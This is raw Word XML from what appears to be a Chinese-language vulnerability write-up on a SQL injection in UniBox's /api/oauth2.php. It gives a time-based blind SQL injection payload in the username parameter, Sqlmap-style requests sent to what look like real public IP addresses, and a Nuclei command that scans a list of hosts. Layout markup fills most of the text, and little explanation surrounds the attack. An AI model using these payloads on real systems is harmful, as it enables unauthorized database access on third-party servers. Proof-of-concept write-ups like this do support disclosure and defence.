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EDA261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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>body="UniBox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568EC0E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3779520"/>
            <wp:effectExtent l="0" t="0" r="4445" b="11430"/>
            <wp:docPr id="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779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23AEA9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"https://www.wifi-soft.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.wifi-soft.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6597FCC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2188845"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="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188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B793C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="3134360"/>
            <wp:effectExtent l="0" t="0" r="10795" b="8890"/>
            <wp:docPr id="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13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770" cy="4341495"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="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341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8D91CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEFF90E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2301752D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C082645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453166F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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2.Nuclei：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE5316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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:65.4pt;width:72.6pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId9" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1468075725" r:id="rId8">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="701459F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Poc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA4661">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Sqlmap：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141FCE5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GET /api/oauth2.php?username=1'+AND+(SELECT+1214+FROM+(SELECT(SLEEP(1)))nfzF)+AND+'oNgk'%3d'oNgk HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0DCEE6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Host: 103.53.75.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBDDB82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Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6482E6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Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D8005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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C5713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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB5D92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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787054E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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7055768B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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B52E97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Cookie: PHPSESSID=5gpgv6b57jsjeq52g9sa0pqp46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078BF04E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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EAFC85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F31A2F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D9F996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GET /api/oauth2.php?username=1* HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30723719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Host: 103.53.75.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A3293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Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF87035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Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65223DD2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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D39F7E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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577A176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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12531C31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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D698FC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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C169A1C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Cookie: PHPSESSID=liibsl0ccncffebbsk1n6al5f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96C1E6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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2538F42E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/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5272405" cy="1316355"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="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31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81C68C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECE682D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GET /api/oauth2.php?username=1* HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C42D0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Host: 185.119.203.32:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D22887D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Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED6B48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Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA2FA2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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EA2BF5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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB78479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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620546DF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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773DF0A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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC0D8A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Cookie: PHPSESSID=liibsl0ccncffebbsk1n6al5f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C01108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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A68A3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73040" cy="491490"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="1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9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17C7E0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12B27F0D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GET /api/oauth2.php?username=1* HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C9329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Host: 206.47.125.163:8123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3490A0C9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Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107605D8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Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F77D29E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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBEDFF0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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB6ED66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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52761E29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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D452B18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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277236D2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Cookie: PHPSESSID=liibsl0ccncffebbsk1n6al5f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5AB37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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A55C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/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5269865" cy="1459230"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
            <wp:docPr id="1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459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012C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACF9A11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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subs</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="15832E80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nuclei.exe -t unibox-route-oauth2-sql.yaml -l subs.txt -stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569D2B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/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5266055" cy="1636395"/>
            <wp:effectExtent l="0" t="0" r="6985" b="9525"/>
            <wp:docPr id="1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636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CD6C9FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4CD6C9FF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3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M1MWJkNWJiY2Q1NzJmZmRlMThjOTUwZWMxNmFkZjkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="000D53A1"/>
    <w:rsid w:val="00202EF2"/>
    <w:rsid w:val="002F5E05"/>
    <w:rsid w:val="003241E1"/>
    <w:rsid w:val="006548B4"/>
    <w:rsid w:val="00D348C5"/>
    <w:rsid w:val="00EA6A45"/>
    <w:rsid w:val="011A24F4"/>
    <w:rsid w:val="013B4944"/>
    <w:rsid w:val="01491054"/>
    <w:rsid w:val="0151634A"/>
    <w:rsid w:val="01691BDB"/>
    <w:rsid w:val="019D55FE"/>
    <w:rsid w:val="01A257B4"/>
    <w:rsid w:val="01AF1A02"/>
    <w:rsid w:val="01D27009"/>
    <w:rsid w:val="01DF21F2"/>
    <w:rsid w:val="01E65CA9"/>
    <w:rsid w:val="01F01DC8"/>
    <w:rsid w:val="020C008E"/>
    <w:rsid w:val="02117ADA"/>
    <w:rsid w:val="0212598F"/>
    <w:rsid w:val="03060F81"/>
    <w:rsid w:val="03324208"/>
    <w:rsid w:val="03373831"/>
    <w:rsid w:val="03BB6210"/>
    <w:rsid w:val="03F41C86"/>
    <w:rsid w:val="03F5128D"/>
    <w:rsid w:val="03FB0D58"/>
    <w:rsid w:val="04210E57"/>
    <w:rsid w:val="0443630F"/>
    <w:rsid w:val="0450610D"/>
    <w:rsid w:val="04770389"/>
    <w:rsid w:val="056A1C9B"/>
    <w:rsid w:val="05721DB6"/>
    <w:rsid w:val="058739B8"/>
    <w:rsid w:val="058A1853"/>
    <w:rsid w:val="05AD6162"/>
    <w:rsid w:val="05DD06BF"/>
    <w:rsid w:val="05EE4EDE"/>
    <w:rsid w:val="05F73ED5"/>
    <w:rsid w:val="06455AA6"/>
    <w:rsid w:val="064C4C64"/>
    <w:rsid w:val="064C5349"/>
    <w:rsid w:val="064C5BC6"/>
    <w:rsid w:val="06654211"/>
    <w:rsid w:val="07280E5C"/>
    <w:rsid w:val="074B1659"/>
    <w:rsid w:val="0799179F"/>
    <w:rsid w:val="07A736DE"/>
    <w:rsid w:val="07EF64D4"/>
    <w:rsid w:val="07F77E76"/>
    <w:rsid w:val="08337083"/>
    <w:rsid w:val="08B17951"/>
    <w:rsid w:val="08B468F8"/>
    <w:rsid w:val="08CB5D31"/>
    <w:rsid w:val="08CC0577"/>
    <w:rsid w:val="08E43623"/>
    <w:rsid w:val="08E549F5"/>
    <w:rsid w:val="09156B25"/>
    <w:rsid w:val="096E7880"/>
    <w:rsid w:val="09830DF2"/>
    <w:rsid w:val="09ED69F7"/>
    <w:rsid w:val="09FC086D"/>
    <w:rsid w:val="0A2829C8"/>
    <w:rsid w:val="0A542580"/>
    <w:rsid w:val="0A8A2498"/>
    <w:rsid w:val="0A922065"/>
    <w:rsid w:val="0AD54ABA"/>
    <w:rsid w:val="0B1323BC"/>
    <w:rsid w:val="0B7F5D75"/>
    <w:rsid w:val="0C561593"/>
    <w:rsid w:val="0C8D16BA"/>
    <w:rsid w:val="0C90770E"/>
    <w:rsid w:val="0CFD385D"/>
    <w:rsid w:val="0D0E4978"/>
    <w:rsid w:val="0D462D5E"/>
    <w:rsid w:val="0D5E7A4B"/>
    <w:rsid w:val="0D735465"/>
    <w:rsid w:val="0DB93DE9"/>
    <w:rsid w:val="0DDF3802"/>
    <w:rsid w:val="0E013AA6"/>
    <w:rsid w:val="0E2B3F92"/>
    <w:rsid w:val="0E336CD8"/>
    <w:rsid w:val="0E3978E0"/>
    <w:rsid w:val="0EBD2C2C"/>
    <w:rsid w:val="0F075DB7"/>
    <w:rsid w:val="0F211F00"/>
    <w:rsid w:val="0F490B74"/>
    <w:rsid w:val="0F7D081D"/>
    <w:rsid w:val="0F8359FA"/>
    <w:rsid w:val="0F9B2092"/>
    <w:rsid w:val="105E354F"/>
    <w:rsid w:val="10894C2E"/>
    <w:rsid w:val="10AE73EC"/>
    <w:rsid w:val="10E9721A"/>
    <w:rsid w:val="10F25629"/>
    <w:rsid w:val="10F90377"/>
    <w:rsid w:val="11025D89"/>
    <w:rsid w:val="112371A2"/>
    <w:rsid w:val="115B2158"/>
    <w:rsid w:val="115F467E"/>
    <w:rsid w:val="117D68B3"/>
    <w:rsid w:val="11922438"/>
    <w:rsid w:val="11A50FAD"/>
    <w:rsid w:val="11B57CFB"/>
    <w:rsid w:val="11D82C36"/>
    <w:rsid w:val="11E86E62"/>
    <w:rsid w:val="12581A0E"/>
    <w:rsid w:val="126900CE"/>
    <w:rsid w:val="12F930C3"/>
    <w:rsid w:val="1317547E"/>
    <w:rsid w:val="131C5736"/>
    <w:rsid w:val="13623FB2"/>
    <w:rsid w:val="13682F98"/>
    <w:rsid w:val="13A85D6F"/>
    <w:rsid w:val="13BD6CEF"/>
    <w:rsid w:val="13E378F1"/>
    <w:rsid w:val="13FE2FFC"/>
    <w:rsid w:val="140219E2"/>
    <w:rsid w:val="14530295"/>
    <w:rsid w:val="148122B0"/>
    <w:rsid w:val="14A97BF1"/>
    <w:rsid w:val="14E87D49"/>
    <w:rsid w:val="15090F73"/>
    <w:rsid w:val="150F2E19"/>
    <w:rsid w:val="15112E59"/>
    <w:rsid w:val="156173A0"/>
    <w:rsid w:val="15BE749A"/>
    <w:rsid w:val="16045210"/>
    <w:rsid w:val="16143E01"/>
    <w:rsid w:val="161B083F"/>
    <w:rsid w:val="161B1921"/>
    <w:rsid w:val="16797889"/>
    <w:rsid w:val="167C30C3"/>
    <w:rsid w:val="16860244"/>
    <w:rsid w:val="16922E00"/>
    <w:rsid w:val="16A82F3A"/>
    <w:rsid w:val="16E85F22"/>
    <w:rsid w:val="16F615E1"/>
    <w:rsid w:val="17373F82"/>
    <w:rsid w:val="17A326FA"/>
    <w:rsid w:val="17A553DC"/>
    <w:rsid w:val="17F04282"/>
    <w:rsid w:val="183E5E44"/>
    <w:rsid w:val="1892304F"/>
    <w:rsid w:val="18A83998"/>
    <w:rsid w:val="196A1E12"/>
    <w:rsid w:val="196D69C8"/>
    <w:rsid w:val="19A96799"/>
    <w:rsid w:val="19D35C88"/>
    <w:rsid w:val="19DD306D"/>
    <w:rsid w:val="19E35721"/>
    <w:rsid w:val="1A280498"/>
    <w:rsid w:val="1A5A5DBB"/>
    <w:rsid w:val="1AF65748"/>
    <w:rsid w:val="1B1E543C"/>
    <w:rsid w:val="1B5A5E46"/>
    <w:rsid w:val="1BC44458"/>
    <w:rsid w:val="1BF743EF"/>
    <w:rsid w:val="1C8634F0"/>
    <w:rsid w:val="1D180364"/>
    <w:rsid w:val="1D8F62F3"/>
    <w:rsid w:val="1DA476EE"/>
    <w:rsid w:val="1DE36113"/>
    <w:rsid w:val="1E1E4B3D"/>
    <w:rsid w:val="1E2C74F6"/>
    <w:rsid w:val="1E312B1D"/>
    <w:rsid w:val="1E8F6475"/>
    <w:rsid w:val="1ECE3356"/>
    <w:rsid w:val="1EFE6FB6"/>
    <w:rsid w:val="1F073974"/>
    <w:rsid w:val="1F142C89"/>
    <w:rsid w:val="1F502E6E"/>
    <w:rsid w:val="1FC77337"/>
    <w:rsid w:val="1FD65821"/>
    <w:rsid w:val="20A63420"/>
    <w:rsid w:val="20EA2C10"/>
    <w:rsid w:val="21525AB7"/>
    <w:rsid w:val="2195103F"/>
    <w:rsid w:val="222334A6"/>
    <w:rsid w:val="223F5B17"/>
    <w:rsid w:val="22653C1A"/>
    <w:rsid w:val="22673393"/>
    <w:rsid w:val="22925F36"/>
    <w:rsid w:val="22933649"/>
    <w:rsid w:val="22B70B00"/>
    <w:rsid w:val="22E25ADE"/>
    <w:rsid w:val="230C63BD"/>
    <w:rsid w:val="2380169C"/>
    <w:rsid w:val="23BC54AD"/>
    <w:rsid w:val="23E073EA"/>
    <w:rsid w:val="23F5277D"/>
    <w:rsid w:val="243557D5"/>
    <w:rsid w:val="24805218"/>
    <w:rsid w:val="249C559F"/>
    <w:rsid w:val="24B1014E"/>
    <w:rsid w:val="24CD3A89"/>
    <w:rsid w:val="24D334FA"/>
    <w:rsid w:val="24D420EB"/>
    <w:rsid w:val="24DA4A09"/>
    <w:rsid w:val="24DA564B"/>
    <w:rsid w:val="253641B3"/>
    <w:rsid w:val="2585101D"/>
    <w:rsid w:val="25A36C3A"/>
    <w:rsid w:val="25E5177E"/>
    <w:rsid w:val="261168A1"/>
    <w:rsid w:val="26322018"/>
    <w:rsid w:val="26675E5D"/>
    <w:rsid w:val="2670099D"/>
    <w:rsid w:val="26775B6F"/>
    <w:rsid w:val="26A26BCE"/>
    <w:rsid w:val="27034482"/>
    <w:rsid w:val="273740AB"/>
    <w:rsid w:val="27571200"/>
    <w:rsid w:val="27611066"/>
    <w:rsid w:val="276D53C1"/>
    <w:rsid w:val="2777374E"/>
    <w:rsid w:val="27AC5CEC"/>
    <w:rsid w:val="287D51FA"/>
    <w:rsid w:val="28C0181B"/>
    <w:rsid w:val="28E45704"/>
    <w:rsid w:val="28E978C7"/>
    <w:rsid w:val="29193C14"/>
    <w:rsid w:val="294E705B"/>
    <w:rsid w:val="297A2DFF"/>
    <w:rsid w:val="299815A5"/>
    <w:rsid w:val="29C93C00"/>
    <w:rsid w:val="2A1046A7"/>
    <w:rsid w:val="2A6D2ED2"/>
    <w:rsid w:val="2A7530F1"/>
    <w:rsid w:val="2A89309F"/>
    <w:rsid w:val="2AAF6413"/>
    <w:rsid w:val="2AB23619"/>
    <w:rsid w:val="2B075097"/>
    <w:rsid w:val="2B1B3AE9"/>
    <w:rsid w:val="2B5D7831"/>
    <w:rsid w:val="2BC469DF"/>
    <w:rsid w:val="2C0F204E"/>
    <w:rsid w:val="2C420DA8"/>
    <w:rsid w:val="2C457F7E"/>
    <w:rsid w:val="2C5A138F"/>
    <w:rsid w:val="2C965046"/>
    <w:rsid w:val="2CD522A4"/>
    <w:rsid w:val="2CED26E7"/>
    <w:rsid w:val="2CF52C77"/>
    <w:rsid w:val="2CFA3411"/>
    <w:rsid w:val="2D2D7AAC"/>
    <w:rsid w:val="2D2E552D"/>
    <w:rsid w:val="2D73279F"/>
    <w:rsid w:val="2DCF1834"/>
    <w:rsid w:val="2DD82143"/>
    <w:rsid w:val="2DE31109"/>
    <w:rsid w:val="2DE65084"/>
    <w:rsid w:val="2DF47AA5"/>
    <w:rsid w:val="2E0D299D"/>
    <w:rsid w:val="2E3D56EB"/>
    <w:rsid w:val="2E7B47FD"/>
    <w:rsid w:val="2E980D78"/>
    <w:rsid w:val="2EA06961"/>
    <w:rsid w:val="2EA3668F"/>
    <w:rsid w:val="2EDF0755"/>
    <w:rsid w:val="2EDF14BE"/>
    <w:rsid w:val="2EFA5A9E"/>
    <w:rsid w:val="2F386DBF"/>
    <w:rsid w:val="2F694AB0"/>
    <w:rsid w:val="2FC76426"/>
    <w:rsid w:val="3053262C"/>
    <w:rsid w:val="30FC4126"/>
    <w:rsid w:val="31003746"/>
    <w:rsid w:val="3106021B"/>
    <w:rsid w:val="31295890"/>
    <w:rsid w:val="31734EAD"/>
    <w:rsid w:val="32B40D7C"/>
    <w:rsid w:val="335214F5"/>
    <w:rsid w:val="33813D35"/>
    <w:rsid w:val="33AB1655"/>
    <w:rsid w:val="33D068BE"/>
    <w:rsid w:val="33E365F1"/>
    <w:rsid w:val="34257C99"/>
    <w:rsid w:val="3443482E"/>
    <w:rsid w:val="344730B4"/>
    <w:rsid w:val="3457176D"/>
    <w:rsid w:val="345D4201"/>
    <w:rsid w:val="3466475F"/>
    <w:rsid w:val="34781430"/>
    <w:rsid w:val="34976CD4"/>
    <w:rsid w:val="34A73AC3"/>
    <w:rsid w:val="34B01683"/>
    <w:rsid w:val="34B25DEE"/>
    <w:rsid w:val="34DD3524"/>
    <w:rsid w:val="35026144"/>
    <w:rsid w:val="35036491"/>
    <w:rsid w:val="35157505"/>
    <w:rsid w:val="351849C1"/>
    <w:rsid w:val="352B1E2A"/>
    <w:rsid w:val="354016EB"/>
    <w:rsid w:val="35527ED3"/>
    <w:rsid w:val="35787EB2"/>
    <w:rsid w:val="35BE0A09"/>
    <w:rsid w:val="35D266A5"/>
    <w:rsid w:val="360D5BA8"/>
    <w:rsid w:val="360F7B72"/>
    <w:rsid w:val="36627694"/>
    <w:rsid w:val="36806A78"/>
    <w:rsid w:val="369B553D"/>
    <w:rsid w:val="36D13079"/>
    <w:rsid w:val="37D261A1"/>
    <w:rsid w:val="37F627D6"/>
    <w:rsid w:val="386514C3"/>
    <w:rsid w:val="387A58E0"/>
    <w:rsid w:val="38994363"/>
    <w:rsid w:val="38CC622B"/>
    <w:rsid w:val="39367CA0"/>
    <w:rsid w:val="39A13F26"/>
    <w:rsid w:val="39B07546"/>
    <w:rsid w:val="3A045513"/>
    <w:rsid w:val="3A2D4A6A"/>
    <w:rsid w:val="3A63223A"/>
    <w:rsid w:val="3A6C2E0F"/>
    <w:rsid w:val="3A8C0A4A"/>
    <w:rsid w:val="3A9A0F33"/>
    <w:rsid w:val="3AA008BD"/>
    <w:rsid w:val="3AA518ED"/>
    <w:rsid w:val="3AD0169E"/>
    <w:rsid w:val="3AE15F1A"/>
    <w:rsid w:val="3B0C0B24"/>
    <w:rsid w:val="3B1E118C"/>
    <w:rsid w:val="3B426FBC"/>
    <w:rsid w:val="3B596336"/>
    <w:rsid w:val="3B927FAC"/>
    <w:rsid w:val="3BA72C58"/>
    <w:rsid w:val="3BAE4409"/>
    <w:rsid w:val="3BC211E2"/>
    <w:rsid w:val="3BDF6A5D"/>
    <w:rsid w:val="3C1F6635"/>
    <w:rsid w:val="3C5E791A"/>
    <w:rsid w:val="3C887100"/>
    <w:rsid w:val="3CD00B52"/>
    <w:rsid w:val="3CEE22A4"/>
    <w:rsid w:val="3D241208"/>
    <w:rsid w:val="3D421E06"/>
    <w:rsid w:val="3D8366DF"/>
    <w:rsid w:val="3D842BF3"/>
    <w:rsid w:val="3D8A7863"/>
    <w:rsid w:val="3DA06A0D"/>
    <w:rsid w:val="3DA44DD0"/>
    <w:rsid w:val="3DAE2C4D"/>
    <w:rsid w:val="3DF1136B"/>
    <w:rsid w:val="3E4E61E9"/>
    <w:rsid w:val="3EC97E6D"/>
    <w:rsid w:val="3F172290"/>
    <w:rsid w:val="3F694271"/>
    <w:rsid w:val="3FA4757D"/>
    <w:rsid w:val="3FD70C44"/>
    <w:rsid w:val="40011C8E"/>
    <w:rsid w:val="40786313"/>
    <w:rsid w:val="40A610D2"/>
    <w:rsid w:val="40E96229"/>
    <w:rsid w:val="41302AA1"/>
    <w:rsid w:val="417137CD"/>
    <w:rsid w:val="41A75AF3"/>
    <w:rsid w:val="41DD7EA2"/>
    <w:rsid w:val="41DE0663"/>
    <w:rsid w:val="41E01774"/>
    <w:rsid w:val="42332EA8"/>
    <w:rsid w:val="428D34C8"/>
    <w:rsid w:val="42B42080"/>
    <w:rsid w:val="42BA3A05"/>
    <w:rsid w:val="42D20D4A"/>
    <w:rsid w:val="42E533F0"/>
    <w:rsid w:val="43147E8E"/>
    <w:rsid w:val="432307B8"/>
    <w:rsid w:val="432E265D"/>
    <w:rsid w:val="435E7A42"/>
    <w:rsid w:val="4360210D"/>
    <w:rsid w:val="437E3D5E"/>
    <w:rsid w:val="438E0F66"/>
    <w:rsid w:val="43BA1B75"/>
    <w:rsid w:val="43D51F31"/>
    <w:rsid w:val="43ED0DC6"/>
    <w:rsid w:val="44110F59"/>
    <w:rsid w:val="44295679"/>
    <w:rsid w:val="444F35A2"/>
    <w:rsid w:val="446961BB"/>
    <w:rsid w:val="44A5726A"/>
    <w:rsid w:val="44B51A9F"/>
    <w:rsid w:val="44C6179E"/>
    <w:rsid w:val="45516648"/>
    <w:rsid w:val="456B3216"/>
    <w:rsid w:val="4579261F"/>
    <w:rsid w:val="458361FD"/>
    <w:rsid w:val="46040D75"/>
    <w:rsid w:val="46113492"/>
    <w:rsid w:val="46130FB8"/>
    <w:rsid w:val="46220F1F"/>
    <w:rsid w:val="46221C41"/>
    <w:rsid w:val="462369A1"/>
    <w:rsid w:val="463A5E4A"/>
    <w:rsid w:val="46430F58"/>
    <w:rsid w:val="464F78B8"/>
    <w:rsid w:val="468E6891"/>
    <w:rsid w:val="469911C5"/>
    <w:rsid w:val="46B502C1"/>
    <w:rsid w:val="46BC589A"/>
    <w:rsid w:val="46BD2CD2"/>
    <w:rsid w:val="47243FC5"/>
    <w:rsid w:val="472B3950"/>
    <w:rsid w:val="474358CD"/>
    <w:rsid w:val="47B03BA9"/>
    <w:rsid w:val="47B16F33"/>
    <w:rsid w:val="47BA644B"/>
    <w:rsid w:val="47F72214"/>
    <w:rsid w:val="48147269"/>
    <w:rsid w:val="48153421"/>
    <w:rsid w:val="48DB648C"/>
    <w:rsid w:val="492B43F9"/>
    <w:rsid w:val="49A104ED"/>
    <w:rsid w:val="49CF5564"/>
    <w:rsid w:val="49FA55DC"/>
    <w:rsid w:val="4A6B50A6"/>
    <w:rsid w:val="4AC62A9D"/>
    <w:rsid w:val="4AC7413B"/>
    <w:rsid w:val="4BBF5506"/>
    <w:rsid w:val="4BDE7972"/>
    <w:rsid w:val="4C1B7A77"/>
    <w:rsid w:val="4C550081"/>
    <w:rsid w:val="4C910E89"/>
    <w:rsid w:val="4CA26BF2"/>
    <w:rsid w:val="4D07739D"/>
    <w:rsid w:val="4D54534E"/>
    <w:rsid w:val="4DF7463E"/>
    <w:rsid w:val="4E443003"/>
    <w:rsid w:val="4E807C9D"/>
    <w:rsid w:val="4E8C5DAC"/>
    <w:rsid w:val="4E9133C2"/>
